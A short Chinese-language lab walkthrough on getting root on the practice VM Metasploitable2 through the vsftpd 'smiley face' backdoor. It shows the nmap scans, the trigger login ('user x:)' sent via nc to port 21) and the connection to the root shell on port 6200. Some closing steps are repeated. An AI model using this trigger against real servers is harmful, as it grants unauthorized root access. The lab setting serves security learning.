使用kali-linux通过笑脸漏洞获取目标靶机最高权限
1,首先启动并登陆一个充满漏洞的靶机Metasploitable2 (Linux)
登陆账号密码都默认为:msfadmin
进去之后了解靶机的ip地址
通过nmap对靶机ip地址进行扫描
我们可以发现21端口是打开的
我们尝试扫描该端口的版本
如图这正是有笑脸漏洞的vsftpd的版本、
查看6200端口情况
我们可以看到第一次用nmap 对6200端口扫描时
该端口是封闭的
连接21端口并通过笑脸漏洞登录
打开一个新的控制台
使用指令 nc ip 21 连接端口
然后输入 user x:) 回车
再输入pass 任意
再次在另外一个控制台扫描6200端口
如图显示已经打开
在控制台连接6200端口
使用指令 nc ip 6200
输入whoami并回车
打开
在控制台连接6200端口
使用指令 nc ip 6200
输入whoami并回车
显示自己的权限为root